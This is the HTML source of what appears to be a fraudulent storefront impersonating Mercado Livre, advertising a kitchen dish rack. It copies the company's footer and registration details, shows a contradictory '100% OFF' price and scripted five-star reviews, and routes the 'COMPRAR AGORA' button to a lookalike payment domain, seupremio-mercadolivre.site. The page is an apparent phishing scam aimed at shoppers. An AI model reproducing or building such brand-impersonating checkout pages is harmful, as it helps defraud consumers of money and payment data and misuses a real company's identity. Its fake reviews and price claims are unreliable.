<!DOCTYPE html><html lang="pt"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Mercado Livre</title>
    <link rel="stylesheet" href="css/8BoGOT2nsMpt.css">
    <link rel="stylesheet" href="css/QWpju8BCdNYF.css">
    <link rel="stylesheet" href="css/UClnL0284Gta.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,1,0">
    <style>
        html, body {
    margin: 0;
    padding: 0;
    overflow-x: hidden;
}
        /* Estilos adicionais conforme necessário */
    </style>
    </head>
<body>
    <!-- Seu conteúdo HTML aqui -->





   
    <div style="background-color: #e6cf00; text-align: center; padding: 5px; font-family: 'GellixMedium'; font-size: 13px; color: white">Promoção exclusiva: 25 anos</div>

    <nav class="navbar" style="padding-top: 15px;">
        <div class="menu-icon" style="padding-left: 3%;" onclick="window.location.href='../loja';">
            <span style="font-family: 'GellixMedium'; color: black;">❮ Voltar</span>
        </div>

        <div class="logo-central">
            <img src="images/qHjsDZC0VfKk.webp" style="height: 5vh;" alt="Logo Central Vivara">
        </div>

        <div class="menu-icon" style="padding-right: 3%;">
            <span class="material-symbols-outlined" style="font-size: 30px; padding-right: 0px; color: black">shopping_cart</span>
        </div>
    </nav>


    <div class="product-info-custom" style="padding-top: 15px; font-family: 'GellixRegular'; color: #9F9F9F;">
        <div class="product-status-custom">
            <span> +5mil resgatados </span>
        </div>
        <div class="product-rating-custom" style="padding-right: 3%; font-family: 'GellixRegular'; color: #9F9F9F;">
            <span> 4.8 </span>
            <span class="stars-custom">
                <span class="star-custom" style="color: #3483FA;">★</span>
                <span class="star-custom" style="color: #3483FA;">★</span>
                <span class="star-custom" style="color: #3483FA;">★</span>
                <span class="star-custom" style="color: #3483FA;">★</span>
                <span class="half-star-custom" style="color: #3483FA;">★</span>
            </span>
            <span> (1718) </span>
        </div>
    </div>
    
    

    

    <p class="title" style="margin-top: 10px;">Escorredor Pro Five De Prato Louça Cozinha Suspensa Armário + Brinde!<span style="font-family: 'GellixBold';"></span><br></p>


    <section class="product-display">
        <img src="images/TtzhwyVmyt1j.webp" alt="Fralda Principal" class="main-image" style="width: 100%; border-radius: 15px; margin: 0 auto; display: flex; margin-top:-10px">
        <div class="thumbnails">
            <img src="images/TtzhwyVmyt1j.webp" alt="Fralda Vista 1" style="border-radius: 15px;">
            <img src="images/QcypSYdOw8HN.webp" alt="Fralda Vista 2" style="border-radius: 15px;">
            <img src="images/ZQyS4UfC5vUt.webp" alt="Fralda Vista 3" style="border-radius: 15px;">
            <img src="images/SR2BMGRScfAZ.webp" alt="Fralda Vista 4" style="border-radius: 15px;">
        </div>
    </section>


    <div class="product-info2">
        <div class="offer-tag2">OFERTA DO DIA</div>

        <div class="old-price2">R$ 695,99</div>

        <span class="new-price2">R$ 97,90</span><span class="discount2">100% OFF</span>

        <div class="free-shipping-container">
            <span class="free-shipping2" style="font-family: 'GellixMedium';">Frete<span class="material-symbols-outlined" style="margin-right: 3px; color: #4caf50;">bolt</span><span style="font-family: 'GellixSemiBold';">FULL</span></span>
        </div>

    </div>

    <button class="pergunta-botao" href="#" onclick="window.open('https://pagamento.seupremio-mercadolivre.site/checkout?product=1bdaf2cd-0377-11f0-8fa3-46da4690ad53')">COMPRAR AGORA</button>
    

    
    
    
    
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Botão Fixo</title>
        <style>
            body {
                font-family: Arial, sans-serif;
                margin: 0;
                padding: 0;
            }
    
            .fixed-button a {
                position: fixed;
                bottom: 0;
                left: 0;
                width: 100%;
                background-color: #28a745;
                padding: 15px 0; /* Ajuste da altura do botão */
                box-shadow: 0 -4px 8px rgba(0, 0, 0, 0.2);
                display: flex;
                justify-content: center;
                align-items: center;
                transition: background-color 0.3s;
                text-decoration: none;
                z-index: 1000; /* Garante que o botão estará no topo */
            }
    
            .fixed-button a span {
                color: white;
                font-size: 18px; /* Ajuste do tamanho do texto */
                font-weight: bold;
                transition: transform 0.3s;
            }
    
            .fixed-button a:hover {
                background-color: #218838;
            }
    
            .fixed-button a:hover span {
                transform: translateY(-2px);
            }
        </style>

    <div class="info-container">
        <div class="info-item">
            <span class="material-symbols-outlined">undo</span>
            <span class="info-text"><a href="#">Devolução grátis.</a> Você tem 30 dias a partir da data de recebimento.</span>
        </div>
        <div class="info-item">
            <span class="material-symbols-outlined">verified_user</span>
            <span class="info-text"><a href="#">Compra Garantida,</a> receba o produto que está esperando ou devolvemos o dinheiro.</span>
        </div>
        <div class="info-item">
            <span class="material-symbols-outlined">emoji_events</span>
            <span class="info-text">12 meses de garantia de fábrica.</span>
        </div>
    </div>


    <div class="button-container">
        <button id="favoriteButton" class="action-button">
            <span id="favoriteIcon" class="material-symbols-outlined" style="color: #007bff">favorite_border</span>
            <span id="favoriteText">Adicionar aos favoritos</span>
        </button>
        <button id="shareButton" class="action-button">
            <span class="material-symbols-outlined" style="color: #007bff">share</span>
            Compartilhar
        </button>
    </div>
    <div id="notification" class="notification hidden">Link copiado com sucesso!</div>

    <div class="divisoria"></div>

    <img decoding="async" class="img-fluid aligncenter perfmatters-lazy entered pmloaded" style="font-size: 7px;" src="images/Zj6oOJNN2drD.webp" alt="" width="402" height="733" data-src="https://cdn.shopify.com/s/files/1/0703/8491/0625/files/01.webp?v=1673648361" data-ll-status="loaded">
    
    <img decoding="async" class="img-fluid aligncenter perfmatters-lazy entered pmloaded" src="images/8RQAISxgNqOQ.gif" alt="" width="390" height="390" data-src="https://cdn.shopify.com/s/files/1/0703/8491/0625/files/01gif.gif?v=1673648430" data-ll-status="loaded">
    
    <img decoding="async" class="img-fluid aligncenter perfmatters-lazy entered pmloaded" src="images/x1pQSqhwRn4d.webp" alt="" width="382" height="710" data-src="https://cdn.shopify.com/s/files/1/0703/8491/0625/files/02.webp?v=1673648394" data-ll-status="loaded">
    
    <img decoding="async" class="img-fluid aligncenter perfmatters-lazy entered pmloaded" src="images/hQ3uv5eLwWir.webp" alt="" width="383" height="876" data-src="https://cdn.shopify.com/s/files/1/0703/8491/0625/files/04.webp?v=1673648447" data-ll-status="loaded">
   
    <img decoding="async" class="img-fluid aligncenter perfmatters-lazy entered pmloaded" src="images/c5udDKipxIxJ.gif" alt="" width="400" height="400" data-src="https://cdn.shopify.com/s/files/1/0703/8491/0625/files/02gif_480x480.gif?v=1673648374" data-ll-status="loaded">

    <div class="divisoria"></div>

    <p style="padding-left: 4%; font-family: 'GellixRegular'; font-size: 20px; padding-top: 15px;">Opiniões do produto</p>

    <img src="images/SpUppIaQnuhc.png" style="width: 100%; display: flex; margin: 0 auto; padding-top: 10px; padding-bottom: 10px;">




    
    <div class="divisoria"></div>
    
    <p style="padding-left: 4%; font-family: 'GellixRegular'; font-size: 20px; padding-top: 15px;">Opiniões em destaque</p>


    
    
    <div class="comment">
            <div class="header">
                <div class="stars">
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                </div>
                <div class="date">11 jul. 2024</div>
            </div>
            <div class="images">
                <img src="images/Cs9DpKPZ8RhJ.webp" alt="Review Image 2">
                <img src="images/4OZDF9H2pL3a.webp" alt="Review Image 3">
                
                
            </div>
            <p>Minha esposa amou, e para mim isso é o que importa. Chegou muito rapido também Obrigado ml.</p>
            <div class="actions">
                <button class="like-button" onclick="toggleLike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">58</span>
                </button>
                <button class="dislike-button" onclick="toggleDislike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_down</span>
                </button>
            </div>
        </div>
    
    <div class="comment">
            <div class="header">
                <div class="stars">
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                </div>
                <div class="date">12 jul. 2024</div>
            </div>
            <div class="images">
                <img src="images/s7VDTvDHDXGu.webp" alt="Review Image 2">
                <img src="images/a7EICQkRSbeu.webp" alt="Review Image 3">
                <img src="images/763ADIwDVbZ8.webp" alt="Review Image 4">
                <img src="images/C0Omt0gNnyUs.webp" alt="Review Image 5">
            </div>
            <p>Gente que perfeição!!! não esperava que fossem tão lindo assim; Aqui em casa somos 3 e meus pais e ja serve muito bem. Até os utensílios vieram com o nome tramontina, achei que fosse vir só um brinde sem marca! nota mil amei..</p>
            <div class="actions">
                <button class="like-button" onclick="toggleLike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">63</span>
                </button>
                <button class="dislike-button" onclick="toggleDislike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_down</span>
                </button>
            </div>
        </div>
    
<div class="comment-container">
        <div class="comment">
            <div class="header">
                <div class="stars">
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                    <span class="material-symbols-outlined stars">star</span>
                </div>
                <div class="date">10 jul. 2024</div>
            </div>
            
            <p>O produto é bom, material de alta qualidade tamanho ideal!!!.</p>
            <div class="actions">
                <button class="like-button" onclick="toggleLike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_up</span> É útil <span class="count">46</span>
                </button>
                <button class="dislike-button" onclick="toggleDislike(this)">
                    <span class="material-symbols-outlined" style="color: black">thumb_down</span>
                </button>
            </div>
        </div>



    
        
        
        
            <meta charset="UTF-8">
            <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
            <title>Mercado Livre</title>
            <style>
                body {
                    margin: 0;
                    padding: 0;
                    font-family: 'GellixRegular';
                    background-color: #f5f5f5; /* Cor de fundo padrão do Mercado Livre */
                }
                .footer-section {
                    background-color: #e6cf00;
                    padding: 20px;
                    margin: 0 auto; /* Centraliza horizontalmente */
                    width: 90%; /* Largura máxima para centralização */
                    max-width: 800px; /* Largura máxima do conteúdo */
                    font-size: 14px;
                    color: black;
                    text-align: center; /* Centraliza o texto */
                    border-top: 2px solid #cccccc; /* Borda superior conforme estilo do Mercado Livre */
                }
                .footer-section span {
                    font-family: 'GellixSemiBold';
                }
            </style>
        
        
            <p class="footer-section">
                <span>Termos e condições. Como cuidamos da sua privacidade. Acessibilidade Informações sobre seguros Blog Afiliados Tendências</span><br><br>
                © 1999-2024 Ebazar.com.br LTDA.CNPJ n.º 03.007.331/0001-41 / Av. das Nações Unidas, nº 3.003, Bonfim, Osasco/SP - CEP 06233-903 - empresa do grupo Mercado Livre.<br><br>
                Brasil/Português
            </p>
        
        
        

    <script src="js/lhRCBnBezGo1.js"></script>

    <script>
        document.querySelectorAll('.thumbnails img').forEach(image => {
            image.addEventListener('click', function() {
                document.querySelector('.main-image').src = this.src;
            });
        });
        document.getElementById("tv").addEventListener("click", timeTv);
    </script>
   
    
    <script src="js/gJ4ZlJh7cHnE.js" async="" defer=""></script>
     
</body></html>